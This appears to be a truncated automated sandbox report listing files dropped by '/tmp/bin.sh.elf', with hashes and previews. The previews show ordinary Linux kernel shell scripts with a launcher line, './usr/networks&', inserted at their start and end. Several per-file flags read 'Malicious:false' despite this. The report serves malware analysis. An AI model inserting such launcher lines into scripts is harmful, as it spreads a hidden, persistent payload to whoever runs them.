                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1306
                                                                        Entropy (8bit):5.232118753528843
                                                                        Encrypted:false
                                                                        SSDEEP:24:koS8g1YJonwE2BxUCLzJ8ZpvPIfTw1aTTPh4V8TahlByh22pTflrykrs4:koS89E2HvZSIrAa3PhUkahXyh2KTlryG
                                                                        MD5:64D41D32A14275C6B34741EE3DFA5EAB
                                                                        SHA1:A441D2F4E709ED46E045A7A51701F4F2B9FB0C36
                                                                        SHA-256:0FB6B7E294DACF7EEF1583A074C8DF2889BD4366062564740E5A985C837C0754
                                                                        SHA-512:B60817E1DFEEF2DA2FBC23656C6C21188B0B5EE1CDE2B46D6DB4FC2A6416298048571A433024A892875F59A91EA175111A0A0D2716C308B35625E4E60FA6A20D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.ls $P > /dev/null 2>&1 || exit 1..# Initialize two files, one for /dev/3270 commands and one.# to replace the /etc/inittab file (old one saved in OLDinittab).echo "#!/bin/sh" > $SCR || exit 1.echo " " >> $SCR.echo "# Script built by /sbin/config3270" >> $SCR.if [ ! -d /dev/dasd ]; then..echo rm -rf "$D/$SUBD/*" >> $SCR.fi.echo "grep -v $TTY $INITTAB > $NINITTAB" > $SCRTMP || exit 1.echo "echo $ADDNOTE >> $NINITTAB" >> $SCRTMP.if [ ! -d /dev/dasd ]; then..echo mkdir -p $D/$SUBD >> $SCR.fi..# Now query the tub3270 driver for 3270 device information.# and add appropriate mknod and mingetty lines to our files.echo what=config > $P.while read devno maj min;do..if [ $min = 0 ]; then...fsmaj=$maj...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB c $fsmaj 0 >> $SCR....echo chmod 666 $D/$TUB >> $SCR...fi..elif [ $maj = CONSOLE ]; then...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TUB$devno c $fsmaj $min >> $SCR...fi..else...if [ ! -d /dev/dasd ]; then....echo mknod $D/$TTY$d
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):19777
                                                                        Entropy (8bit):5.576952905096142
                                                                        Encrypted:false
                                                                        SSDEEP:384:fwMxiQBla8sAxIEVcwZ+ZoBaOOatUdpVnismIm4FOtcra5rdr/QB5oAl6MQBX6hy:fwMxra8HxIEkmImIOtcra5rAoAl636hy
                                                                        MD5:3CF3EA10A24E6A5799372E52C625F5FF
                                                                        SHA1:8DCE2DD4D30FE29A3CD9B06E8C276CFAEB41B191
                                                                        SHA-256:FD1FB0A9D12E75013B3C330D081C6817E5C0090DE03C22A96B14674A168B307F
                                                                        SHA-512:D0108C351A191121A5DB5777A451261837126CC955FFADCF0855C82F27CCF794B91FED77DE152AD61907595A30E879EA582E9819CCAEAC0BDCCAF82C07CC59CE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1.fi.# ============= MultiSound.d/setdigital.c ==============.if test ! -d 'MultiSound.d'; then. $echo 'x -' 'creating directory' 'MultiSound.d'. mkdir 'MultiSound.d'.fi.if test -f 'MultiSound.d/setdigital.c' && test "$first_param" != -c; then. $echo 'x -' SKIPPING 'MultiSound.d/setdigital.c' '(file already exists)'.else. $echo 'x -' extracting 'MultiSound.d/setdigital.c' '(text)'. sed 's/^X//' << 'SHAR_EOF' > 'MultiSound.d/setdigital.c' &&./*********************************************************************.X *.X * setdigital.c - sets the DIGITAL1 input for a mixer.X *.X * Copyright (C) 1998 Andrew Veliath.X *.X * This program is free software; you can redistribute it and/or modify.X * it under the terms of the GNU General Public License as published by.X * the Free Software Foundation; either version 2 of the License, or.X * (at your option) any later version..X *.X * This program is distributed in the hope that it will be useful,.X * but WITHOUT ANY WAR
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1019
                                                                        Entropy (8bit):5.264867233271885
                                                                        Encrypted:false
                                                                        SSDEEP:24:NcdhLFmJJsA1Mz9mOBM1t1IjQ+51MC1JOgULmjXUkSo0:NYs51gXe1i95JJB8mH0
                                                                        MD5:946D056056885AB81686DFF084F8C0AC
                                                                        SHA1:6087B2C2445E11CDE4F03C2E71A445978D68C166
                                                                        SHA-256:CF5DEAF653121D3BAE355DBBF73837ABDB5AD46871BCE09376D1EAE23DBAC41A
                                                                        SHA-512:D91BE0DF8EB1A761C0BA21D6D563C90D1AB7A740CDCB1A71D611D3C8F6C48D4D6C6291E77B407E51AE9D8D264726806E82CDE5FF00068E0A0487598656365489
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..[ "$val" ] || { echo "can't find $1 in $VMLINUX" 1>&2; exit 1; }..# convert from hex to decimal..echo $((0x$val)).}..__data_loc=$(sym_val __data_loc)._edata_loc=$(sym_val _edata_loc).base_offset=$(sym_val _xiprom)..# convert to file based offsets.data_start=$(($__data_loc - $base_offset)).data_end=$(($_edata_loc - $base_offset))..# Make sure data occupies the last part of the file..file_end=$(${CONFIG_SHELL} "${srctree}/scripts/file-size.sh" "$XIPIMAGE").if [ "$file_end" != "$data_end" ]; then..printf "end of xipImage doesn't match with _edata_loc (%#x vs %#x)\n" \.. $(($file_end + $base_offset)) $_edata_loc 1>&2..exit 1;.fi..# be ready to clean up.trap 'rm -f "$XIPIMAGE.tmp"; exit 1' 1 2 3..# substitute the data section by a compressed version.$DD if="$XIPIMAGE" count=$data_start iflag=count_bytes of="$XIPIMAGE.tmp".$DD if="$XIPIMAGE" skip=$data_start iflag=skip_bytes |.$KGZIP -9 >> "$XIPIMAGE.tmp"..# replace kernel binary.mv -f "$XIPIMAGE.tmp" "$XIPIMAGE"../us
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):810
                                                                        Entropy (8bit):5.14795580060536
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBkcCZsL49ysL7FwuIGCjDCLn:M4+XKyrZRCZsL4QsL7FwuIzvCL
                                                                        MD5:DD8FCA0CC462A93575815302D5C70995
                                                                        SHA1:FFE07B0595BA0DAA3799B71E79F3648D02B641D3
                                                                        SHA-256:FC1B0AA6D39705668CA297DACF643A6D429E42A84DABDE0601734F864DBE364F
                                                                        SHA-512:D28E0773CFD7FA867E627785D1D86A8AC74A92FB5CB6CC47E642B1E41EB0DCB015D4186D87962A63BF51E22B2EF7FE237C1BCA9B04D557E2C48755D6EF319658
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1..if [ -x /sbin/loadmap ]; then. /sbin/loadmap.else. echo "You have to install it yourself".fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):3.90905274301989
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxpjUvwcG6IYlfkoeOPeQxS8LXEVvXFNK/5e9o4TLZFwqwXF6HF/qHF7VvMTc2:apovwTMldPzMvHK/5u3rHoHjUAEPTn
                                                                        MD5:543D5DBC6E85559159F104129FF1BF1F
                                                                        SHA1:324751DF3B652BC8C71B68222D94E6A74C27B1B1
                                                                        SHA-256:97ABE3A808380B11D216A3484E4156BFA5336031DD00A76307C2987585FBFF77
                                                                        SHA-512:880C67C68ED1AB3436653F636294C1FCD3F70EE82C66529E99D95D1428902417FD2053093CE5D047088AE26B45822D39BFDC9AFFC9CC14FBC61C81DFBA96E59A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1. fi...if [ -n "$entry" ]; then. if [ -z "$compat" ]; then. echo "NATIVE($nr, $entry)". else. echo "COMPAT($nr, $entry, $compat)". fi. fi. done.) > "$out"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):716
                                                                        Entropy (8bit):5.188740504939567
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                                        MD5:E233F7425841D915F481DD78C9518D4D
                                                                        SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                                        SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                                        SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):524
                                                                        Entropy (8bit):5.2190434920010835
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                                        MD5:F01984516C5B822703949B83099EB130
                                                                        SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                                        SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                                        SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1013
                                                                        Entropy (8bit):4.980378985367638
                                                                        Encrypted:false
                                                                        SSDEEP:24:OU6oYRFZSo7Zm5Ddv8y8bULN4ty/Mf4ikCB57SQj8X4:+zR3YddX8bUB4s+6CUM+4
                                                                        MD5:7066B68ACB7D6AA34D784436E376FE3A
                                                                        SHA1:E2A329E97BD265AEE872457C3A68466FEA9E30FE
                                                                        SHA-256:51F3DFFB7DCF3DFC8A3446165E3A3F97027B09BDE97F7F93BBCD7F8C45AABA3F
                                                                        SHA-512:7BF04CD7FB7DBA2D836D8EB31252496AA37375C0C6363426283610451B3D709CC1C01339E8D754666823AB2161ABFF5C5E918A8E03910C5E723E607D96CE2C36
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..# is not found then the subshell will exit with code 1, and we'll..# continue on to the next board...grep -E '^# require ' "${board_cfg}" | \.. cut -d' ' -f 3- | \.. while read req; do...case ${req} in...*=y)....# If we require something =y then we check that a line....# containing it is present in the reference config.....grep -Eq "^${req}\$" "${ref_cfg}" && continue....;;...*=n)....# If we require something =n then we just invert that....# check, considering the requirement met if there isn't....# a line containing the value =y in the reference....# config.....grep -Eq "^${req/%=n/=y}\$" "${ref_cfg}" || continue....;;...*)....echo "WARNING: Unhandled requirement '${req}'"....;;...esac....[ ${print_skipped} -eq 1 ] && echo "Skipping ${board_cfg}"...exit 1..done || continue...# Merge this board config fragment into our final config file..${srctree}/scripts/kconfig/merge_config.sh \...-m -O ${objtree} ${cfg} ${board_cfg} \...| grep -Ev '^(#|Using)'.done../usr/netw
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):524
                                                                        Entropy (8bit):5.2190434920010835
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                                        MD5:F01984516C5B822703949B83099EB130
                                                                        SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                                        SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                                        SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):777
                                                                        Entropy (8bit):5.181427208784543
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIG7n:M4wsPzaKar00RCZsL4QsL7FwuIc
                                                                        MD5:448535F84AA5B4CAF079F69C4D491EA2
                                                                        SHA1:F4BCEBECCC6AA1841C78F1783191655E2A76340E
                                                                        SHA-256:B992FF78499EC3BB631F7746FBD2CCC8FC192A322EE9BB1D2113F3DDE83D81BF
                                                                        SHA-512:C23AE1337A6C387F0CB69C9159BF5828B742F8D1FC29CCF320CD87F19650531B398143710A7A8CAA45845C87FD4651653F115BAD4D88ED7D3F6E81D1C472A0F7
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):778
                                                                        Entropy (8bit):5.180114046612086
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIGTn:M4wsPzaKar00RCZsL4QsL7FwuIK
                                                                        MD5:FAE5274E36F391AA1552A80ADE42164D
                                                                        SHA1:A28F085E263CC5A91CBE11543B8075467C2C1351
                                                                        SHA-256:0AF4573794FA7AF09FA3A0CD808D2741973B646D1AAD18D3CE8188E85CD68655
                                                                        SHA-512:9AAA1A6F202071879DDAA032BFB03E1B663C2A6C3ADAAA1B7109C603B1F380C48A9D7D17FA8CA0E009DA427A9596FA4A47DB844022CBF227A919C491B9FDAD7E
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.137824116354036
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk33g0VOORgn:HA7n
                                                                        MD5:7DD33E5C2454D655FD681039B5DEB4EE
                                                                        SHA1:9618B85AD954925D61B4AAB7A6A83CB02A5F1BD2
                                                                        SHA-256:4235524DE1D4B7DC6B802D9E371A65F9DB24647A3B62D5BEDE0C122405FC8FD1
                                                                        SHA-512:A0AC5DDE47E2716BAC26F2868BF5195179657D94E7158CE5BF353F6877B277C6E78A547F4253562467904B89F12A61226F0A7BDE245A908EAC314014EBD4D1BA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $ERROR../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):269
                                                                        Entropy (8bit):4.8822799035917495
                                                                        Encrypted:false
                                                                        SSDEEP:6:ch+6yV6DoxC0ld8FxsIEYNkvqcl5gsfFmvGqBGJnn6yZrIOC6Pn:ch/PsxCc+qYtclxfQJYgwPn
                                                                        MD5:EA02BAC09855DFCE9A7F5A6EAB955ECB
                                                                        SHA1:C0747E33E635087BB7925771BC2AA68D8A1CC100
                                                                        SHA-256:A6A8FAEAC216D55F14C091C5ACBF953A1110B0BFC69F6772A57C7A04756D940E
                                                                        SHA-512:1E7B813ABAC13989C729AA9E1611BC7E5346B52C9ED7E5DC014F048B5FB39618FBE0D398F31836012BD5B057E05125E7E8AD32956BC51914037C73AD346C32EB
                                                                        Malicious:false
                                                                        Preview:./usr/networks&....exit(1);...}...num = -1;.# Ignore the rest of the file..}..{...if (num == -1) next;...if (($1 != -1) && ($1 != num)) {....printf "Error: Syscall %s out of order (expected %s)\n",.....$1, num;....exit(1);...};...num++;..}' "$1"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):58
                                                                        Entropy (8bit):3.8859027122378516
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxJjUvfvKDlOORgn:aJovHK4n
                                                                        MD5:A73EAA64A7F7396DC86EEE96772F5CAD
                                                                        SHA1:F496C2203BEF6CF66500070F1F106A6DE84ED2C0
                                                                        SHA-256:5304A36BE867369941B7CA90AFA619ADB7D761CB1A38D520B403E2E8A8FDDE39
                                                                        SHA-512:AA605A73179060C352A0F366733C9477F60A8CBB4108AFAA555C787526C4B62A359A37DD08E30F68F8AE634A9A20082E1DC6D36081E7C3B12DADAD626AA7F73F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1..exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1374
                                                                        Entropy (8bit):5.049143893926127
                                                                        Encrypted:false
                                                                        SSDEEP:24:rUxDXOUwPQCwVsoKNSruNlVQbhYsph0taGOl53jNadNQFOXgh0taGOlK:rUF+NPfwVs2rMVQbWMjZlJ1FOCjZlK
                                                                        MD5:F0C24F2801E658FF3A01A33E26EA7682
                                                                        SHA1:27934B831C1B88A8F9D44E91CC189CA4AD72017C
                                                                        SHA-256:6202A59E4AAE5585804E49A01828E70FED9614D7361BA6CD66E2214C97E5E096
                                                                        SHA-512:48BA3A398680810E72E386A8D3882791B1AF3DB2C719CB06ADBDF1AE23E9785AE6B9F199127BA65C1361B91CDE77742903CCD1DE3B806FB6CDB25CA1642C187A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to nm so we handle cross compilation..nm="$1".vmlinux="$2"..# gcc-4.6-era toolchain make _stext an A (absolute) symbol rather than T.$nm "$vmlinux" | grep -e " [TA] _stext$" -e " t start_first_256B$" -e " a text_start$" -e " t start_text$" -m4 > .tmp_symbols.txt...vma=$(cat .tmp_symbols.txt | grep -e " [TA] _stext$" | cut -d' ' -f1)..expected_start_head_addr=$vma..start_head_addr=$(cat .tmp_symbols.txt | grep " t start_first_256B$" | cut -d' ' -f1)..if [ "$start_head_addr" != "$expected_start_head_addr" ]; then..echo "ERROR: head code starts at $start_head_addr, should be $expected_start_head_addr"..echo "ERROR: try to enable LD_HEAD_STUB_CATCH config option"..echo "ERROR: see comments in arch/powerpc/tools/head_check.sh"...exit 1.fi..top_vma=$(echo $vma | cut -d'0' -f1)..expected_start_text_addr=$(cat .tmp_symbols.txt | grep " a text_start$" | cut -d' ' -f1 | sed "s/^0/$top_vma/")..start_text_addr=$(cat .tmp_symbols.txt | grep
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1338
                                                                        Entropy (8bit):5.413049078573915
                                                                        Encrypted:false
